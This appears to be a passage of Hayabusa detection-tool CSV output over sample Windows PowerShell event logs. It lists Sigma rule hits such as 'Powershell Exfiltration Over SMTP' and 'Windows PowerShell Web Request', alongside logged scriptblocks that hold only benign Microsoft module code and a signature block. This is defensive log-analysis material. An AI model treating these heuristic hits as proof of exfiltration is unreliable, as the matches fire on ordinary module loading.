+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""1DA87E53-152B-403E-98DC-74D7B4D63D59"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" CmdletsToExport= ""Format-List"", ""Format-Custom"", ""Format-Table"", ""Format-Wide"", ""Out-File"", ""Out-Printer"", ""Out-String"", ""Out-GridView"", ""Get-FormatData"", ""Export-FormatData"", ""ConvertFrom-Json"", ""ConvertTo-Json"", ""Invoke-RestMethod"", ""Invoke-WebRequest"", ""Register-ObjectEvent"", ""Register-EngineEvent"", ""Wait-Event"", ""Get-Event"", ""Remove-Event"", ""Get-EventSubscriber"", ""Unregister-Event"", ""New-Event"", ""Add-Member"", ""Add-Type"", ""Compare-Object"", ""ConvertTo-Html"", ""ConvertFrom-StringData"", ""Export-Csv"", ""Import-Csv"", ""ConvertTo-Csv"", ""ConvertFrom-Csv"", ""Export-Alias"", ""Invoke-Expression"", ""Get-Alias"", ""Get-Culture"", ""Get-Date"", ""Get-Host"", ""Get-Member"", ""Get-Random"", ""Get-UICulture"", ""Get-FileHash"", ""Get-Unique"", ""Export-PSSession"", ""Import-PSSession"", ""Import-Alias"", ""Import-LocalizedData"", ""Select-String"", ""Measure-Object"", ""New-Alias"", ""New-TimeSpan"", ""Read-Host"", ""Set-Alias"", ""Set-Date"", ""Start-Sleep"", ""Tee-Object"", ""Measure-Command"", ""Update-List"", ""Update-TypeData"", ""Update-FormatData"", ""Remove-TypeData"", ""Get-TypeData"", ""Write-Host"", ""Write-Progress"", ""New-Object"", ""Select-Object"", ""Group-Object"", ""Sort-Object"", ""Get-Variable"", ""New-Variable"", ""Set-Variable"", ""Remove-Variable"", ""Clear-Variable"", ""Export-Clixml"", ""Import-Clixml"", ""ConvertTo-Xml"", ""Select-Xml"", ""Write-Debug"", ""Write-Verbose"", ""Write-Warning"", ""Write-Error"", ""Write-Output"", ""Set-PSBreakpoint"", ""Get-PSBreakpoint"", ""Remove-PSBreakpoint"", ""Enable-PSBreakpoint"", ""Disable-PSBreakpoint"", ""Get-PSCallStack"", ""Send-MailMessage"", ""Get-TraceSource"", ""Set-TraceSource"", ""Trace-Command"", ""Show-Command"", ""Unblock-File"" NestedModules=""Microsoft.PowerShell.Commands.Utility.dll"",""Microsoft.PowerShell.Utility.psm1"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285758' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } } function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } } # SIG # Begin signature block # MIIavwYJKoZIhvcNAQcCoIIasDCCGqwCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU4uPI6oMmN45jE4gtibs9Byjz # 1dCgghWCMIIEwzCCA6ugAwIBAgITMwAAADUo7mFTkiJhkQAAAAAANTANBgkqhkiG # 9w0BAQUFADB3MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEw # HwYDVQQDExhNaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EwHhcNMTMwMzI3MjAwODI2 # WhcNMTQwNjI3MjAwODI2WjCBszELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjENMAsGA1UECxMETU9QUjEnMCUGA1UECxMebkNpcGhlciBEU0UgRVNO # OjMxQzUtMzBCQS03QzkxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm9vWEfGEH1m0 # kUedzTgvsolxQaJbPc6WtX2a9wqAK0ICg8R8//f26pcftWw4XkuVVOjsk9K5TeT3 # KyaHr7vrG+hNHCFDF/igM5qRsYFNOIEkUwKxdnlaLqz7y4xcXTubXKU7NoBsI3S2 # xnffQyfNOpmouBP65aqjt8VzhFbsjsFIMwGJMa8nNq07LQDicQQxvva3dLFnP1rl # hLUBJpB4iYAlPj5CHFJKZCcCaM6iBr7QtT5EF4CZiImcwLkP1fI5lcM1FLsJEEW5 # 6m5frIDLh3xFZAImCU+adqVmvhBJKKO57P+y+mFb+WPqknL1SurKOz0TkYw7/TnW # STwC7nod4QIDAQABo4IBCTCCAQUwHQYDVR0OBBYEFLkUVdsQ7WBr1Q2DdA3Oc3OV # ImUcMB8GA1UdIwQYMBaAFCM0+NlSRnAK7UD7dvuzK7DDNbMPMFQGA1UdHwRNMEsw # SaBHoEWGQ2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3Rz # L01pY3Jvc29mdFRpbWVTdGFtcFBDQS5jcmwwWAYIKwYBBQUHAQEETDBKMEgGCCsG # AQUFBzAChjxodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY3Jv # c29mdFRpbWVTdGFtcFBDQS5jcnQwEwYDVR0lBAwwCgYIKwYBBQUHAwgwDQYJKoZI # hvcNAQEFBQADggEBAJaVlxhREadlaCDXqFbP6lUQVKjx5/JsbwouUz8YgQjPN/Y1 # ymKKoJBe4u9HzqrHBZj93hq26BKkmrnKpWKvyOY+ODJcA9PzaPlgnMeyJdykTGuP # BsvYtsFYIn6E1Wu56PE+L3n28vpsaOjKAl8BvrGgbPmPRbm4SwZfxJSO9+3r1yFa # uFZbeGfcQAl82pKj27zQmh2O5snaz1Iff7+W3owsX20ilqNJ+acaIl7/6cpyJUC4 # 87hUHlrIV1CyiyLmEOyt7aUQlFLU7VtXgskXVPZ03lGrVDTglUY63lUwGhdwL5f2 # CgYipvqCjochior3gYxSN0w6jQRbNcvzG4N1vl0wggTsMIID1KADAgECAhMzAAAA # sBGvCovQO5/dAAEAAACwMA0GCSqGSIb3DQEBBQUAMHkxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBMB4XDTEzMDEyNDIyMzMzOVoXDTE0MDQyNDIyMzMzOVowgYMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xDTALBgNVBAsTBE1PUFIx # HjAcBgNVBAMTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAOivXKIgDfgofLwFe3+t7ut2rChTPzrbQH2zjjPmVz+l # URU0VKXPtIupP6g34S1Q7TUWTu9NetsTdoiwLPBZXKnr4dcpdeQbhSeb8/gtnkE2 # KwtA+747urlcdZMWUkvKM8U3sPPrfqj1QRVcCGUdITfwLLoiCxCxEJ13IoWEfE+5 # G5Cw9aP+i/QMmk6g9ckKIeKq4wE2R/0vgmqBA/WpNdyUV537S9QOgts4jxL+49Z6 # dIhk4WLEJS4qrp0YHw4etsKvJLQOULzeHJNcSaZ5tbbbzvlweygBhLgqKc+/qQUF # 4eAPcU39rVwjgynrx8VKyOgnhNN+xkMLlQAFsU9lccUCAwEAAaOCAWAwggFcMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRZcaZaM03amAeA/4Qevof5cjJB # 8jBRBgNVHREESjBIpEYwRDENMAsGA1UECxMETU9QUjEzMDEGA1UEBRMqMzE1OTUr # NGZhZjBiNzEtYWQzNy00YWEzLWE2NzEtNzZiYzA1MjM0NGFkMB8GA1UdIwQYMBaA # FMsR6MrStBZYAck3LjMWFrlMmgofMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9j # cmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY0NvZFNpZ1BDQV8w # OC0zMS0yMDEwLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljQ29kU2lnUENBXzA4LTMx # LTIwMTAuY3J0MA0GCSqGSIb3DQEBBQUAA4IBAQAx124qElczgdWdxuv5OtRETQie # 7l7falu3ec8CnLx2aJ6QoZwLw3+ijPFNupU5+w3g4Zv0XSQPG42IFTp8263Os8ls # ujksRX0kEVQmMA0N/0fqAwfl5GZdLHudHakQ+hywdPJPaWueqSSE2u2WoN9zpO9q # GqxLYp7xfMAUf0jNTbJE+fA8k21C2Oh85hegm2hoCSj5ApfvEQO6Z1Ktwemzc6bS # Y81K4j7k8079/6HguwITO10g3lU/o66QQDE4dSheBKlGbeb1enlAvR/N6EXVruJd # PvV1x+ZmY2DM1ZqEh40kMPfvNNBjHbFCZ0oOS786Du+2lTqnOOQlkgimiGaCMIIF # vDCCA6SgAwIBAgIKYTMmGgAAAAAAMTANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm # iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQD # EyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAwODMx # MjIxOTMyWhcNMjAwODMxMjIyOTMyWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBD # QTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJyWVwZMGS/HZpgICBC # mXZTbD4b1m/My/Hqa/6XFhDg3zp0gxq3L6Ay7P/ewkJOI9VyANs1VwqJyq4gSfTw # aKxNS42lvXlLcZtHB9r9Jd+ddYjPqnNEf9eB2/O98jakyVxF3K+tPeAoaJcap6Vy # c1bxF5Tk/TWUcqDWdl8ed0WDhTgW0HNbBbpnUo2lsmkv2hkL/pJ0KeJ2L1TdFDBZ # +NKNYv3LyV9GMVC5JxPkQDDPcikQKCLHN049oDI9kM2hOAaFXE5WgigqBTK3S9dP # Y+fSLWLxRT3nrAgA9kahntFbjCZT6HqqSvJGzzc8OJ60d1ylF56NyxGPVjzBrAlf # A9MCAwEAAaOCAV4wggFaMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMsR6MrS # tBZYAck3LjMWFrlMmgofMAsGA1UdDwQEAwIBhjASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBT90TFO0yaKleGYYDuoMW+mPLzYLTAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTAfBgNVHSMEGDAWgBQOrIJgQFYnl+UlE/wq4QpTlVnk # pDBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtp # L2NybC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmwwVAYIKwYBBQUHAQEE # SDBGMEQGCCsGAQUFBzAChjhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY3Jvc29mdFJvb3RDZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAgEAWTk+ # fyZGr+tvQLEytWrrDi9uqEn361917Uw7LddDrQv+y+ktMaMjzHxQmIAhXaw9L0y6 # oqhWnONwu7i0+Hm1SXL3PupBf8rhDBdpy6WcIC36C1DEVs0t40rSvHDnqA2iA6VW # 4LiKS1fylUKc8fPv7uOGHzQ8uFaa8FMjhSqkghyT4pQHHfLiTviMocroE6WRTsgb # 0o9ylSpxbZsa+BzwU9ZnzCL/XB3Nooy9J7J5Y1ZEolHN+emjWFbdmwJFRC9f9Nqu # 1IIybvyklRPk62nnqaIsvsgrEA5ljpnb9aL6EiYJZTiU8XofSrvR4Vbo0HiWGFzJ # NRZf3ZMdSY4tvq00RBzuEBUaAF3dNVshzpjHCe6FDoxPbQ4TTj18KUicctHzbMrB # 7HCjV5JXfZSNoBtIA1r3z6NnCnSlNu0tLxfI5nI3EvRvsTxngvlSso0zFmUeDord # EN5k9G/ORtTTF+l5xAS00/ss3x+KnqwK+xMnQK3k+eGpf0a7B2BHZWBATrBC7E7t # s3Z52Ao0CW0cgDEf4g5U3eWh++VHEK1kmP9QFi58vwUheuKVQSdpw5OPlcmN2Jsh # rg1cnPCiroZogwxqLbt2awAdlq3yFnv2FoMkuYjPaqhHMS+a3ONxPdcAfmJH0c6I # ybgY+g5yjcGjPa8CQGr/aZuW4hCoELQ3UAjWwz0wggYHMIID76ADAgECAgphFmg0 # AAAAAAAcMA0GCSqGSIb3DQEBBQUAMF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAX # BgoJkiaJk/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jvc29mdCBSb290 # IENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0wNzA0MDMxMjUzMDlaFw0yMTA0MDMx # MzAzMDlaMHcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xITAf # BgNVBAMTGE1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQTCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAJ+hbLHf20iSKnxrLhnhveLjxZlRI1Ctzt0YTiQP7tGn # 0UytdDAgEesH1VSVFUmUG0KSrphcMCbaAGvoe73siQcP9w4EmPCJzB/LMySHnfL0 # Zxws/HvniB3q506jocEjU8qN+kXPCdBer9CwQgSi+aZsk2fXKNxGU7CG0OUoRi4n # rIZPVVIM5AMs+2qQkDBuh/NZMJ36ftaXs+ghl3740hPzCLdTbVK0RZCfSABKR2YR # JylmqJfk0waBSqL5hKcRRxQJgp+E7VV4/gGaHVAIhQAQMEbtt94jRrvELVSfrx54 # QTF3zJvfO4OToWECtR0Nsfz3m7IBziJLVP/5BcPCIAsCAwEAAaOCAaswggGnMA8G # A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFCM0+NlSRnAK7UD7dvuzK7DDNbMPMAsG # A1UdDwQEAwIBhjAQBgkrBgEEAYI3FQEEAwIBADCBmAYDVR0jBIGQMIGNgBQOrIJg # QFYnl+UlE/wq4QpTlVnkpKFjpGEwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcG # CgmSJomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWljcm9zb2Z0IFJvb3Qg # Q2VydGlmaWNhdGUgQXV0aG9yaXR5ghB5rRahSqClrUxzWPQHEy5lMFAGA1UdHwRJ # MEcwRaBDoEGGP2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1 # Y3RzL21pY3Jvc29mdHJvb3RjZXJ0LmNybDBUBggrBgEFBQcBAQRIMEYwRAYIKwYB # BQUHMAKGOGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljcm9z # b2Z0Um9vdENlcnQuY3J0MBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEB # BQUAA4ICAQAQl4rDXANENt3ptK132855UU0BsS50cVttDBOrzr57j7gu1BKijG1i # uFcCy04gE1CZ3XpA4le7r1iaHOEdAYasu3jyi9DsOwHu4r6PCgXIjUji8FMV3U+r # kuTnjWrVgMHmlPIGL4UD6ZEqJCJw+/b85HiZLg33B+JwvBhOnY5rCnKVuKE5nGct # xVEO6mJcPxaYiyA/4gcaMvnMMUp2MT0rcgvI6nA9/4UKE9/CCmGO8Ne4F+tOi3/F # NSteo7/rvH0LQnvUU3Ih7jDKu3hlXFsBFwoUDtLaFJj1PLlmWLMtL+f5hYbMUVbo # nXCUbKw5TNT2eb+qGHpiKe+imyk0BncaYsk9Hm0fgvALxyy7z0Oz5fnsfbXjpKh0 # NbhOxXEjEiZ2CzxSjHFaRkMUvLOzsE1nyJ9C/4B5IYCeFTBm6EISXhrIniIh0EPp # K+m79EjMLNTYMoBMJipIJF9a6lbvpt6Znco6b72BJ3QGEe52Ib+bgsEnVLaxaj2J # oXZhtG6hE6a/qkfwEm/9ijJssv7fUciMI8lmvZ0dhxJkAj0tr1mPuOQh5bWwymO0 # eFQF1EEuUKyUsKV4q7OglnUa2ZKHE3UiLzKoCG6gW4wlv6DvhMoh1useT8ma7kng # 9wFlb4kLfchpyOZu6qeXzjEp/w7FW1zYTRuh2Povnj8uVRZryROj/TGCBKcwggSj # AgEBMIGQMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xIzAh # BgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBAhMzAAAAsBGvCovQO5/d # AAEAAACwMAkGBSsOAwIaBQCggcAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYEFClk # UQl5qDpcmXxdpFeDJK8FifcsMGAGCisGAQQBgjcCAQwxUjBQoCaAJABXAGkAbgBk # AG8AdwBzACAAUABvAHcAZQByAFMAaABlAGwAbKEmgCRodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcG93ZXJzaGVsbCAwDQYJKoZIhvcNAQEBBQAEggEALlxQato88b0W # GuCgTkjSdxozipikRZRALhDIbPeqH6HtmgJcwK723FNOko6J0Xrhnt1w+Ypx77X2 # 8yP9Hu2sG+Cm+vH4RcLCKR9zAUQGmURsoNhCcRebCKchavCcPqYzL8WmMToUVuEB # epnqGcNr8gMvhur6+Tw22bJewK48IdD96JBDVEoihHj8d0jwM19UFPuT+EmebCRv # 8ii/hESmbCZnwQclRzaoA3oJ+odsWN+XbE3fHhrGSfnE7yaiMKsyHKQ+RsV9c1x9 # /XgOkPj1o/cfKgQ0qeOamP7HmABCWv9jGBaQ/lpLASraT6gaTl9yEPvuKx1ozorh # G1o2H651lKGCAigwggIkBgkqhkiG9w0BCQYxggIVMIICEQIBATCBjjB3MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEwHwYDVQQDExhNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0ECEzMAAAA1KO5hU5IiYZEAAAAAADUwCQYFKw4DAhoF # AKBdMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTEz # MTIxODAwMjI1OFowIwYJKoZIhvcNAQkEMRYEFKH1XT6678OZm4aTERf5dKwwQZed # MA0GCSqGSIb3DQEBBQUABIIBAGgc0v8jALuDbFhj0n+eoe+T+K3O7SCk9SDcc8wC # 9MP+HYeyr7IvyMJY9Prn1v/JEkUNBczhWmFluGBzw1ASpTkP5hJRbdZFiQkbtqR1 # PZi8TWsbcoWjbqzwR3fgiwydRlkDu0zKO+P3pbuHFgO2ACb7ggLRllTgfWNJFZGg # iHFwS0JLQttb18AZTZyt7VteGhzOrcfRP97+bPpidJXfR1eMXbeoXuAROO0LdNP1 # 6QcsS/++dFMLo+s7ISTcdh9OTKg672kD7zo2+UKZ/MvJbsOikD7cFJppM2ZDCnvi # S5HhTmzKz47z2m+/DsWq7NMZ1pfJFojTeMw8niuUPNOZWRg= # SIG # End signature block",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
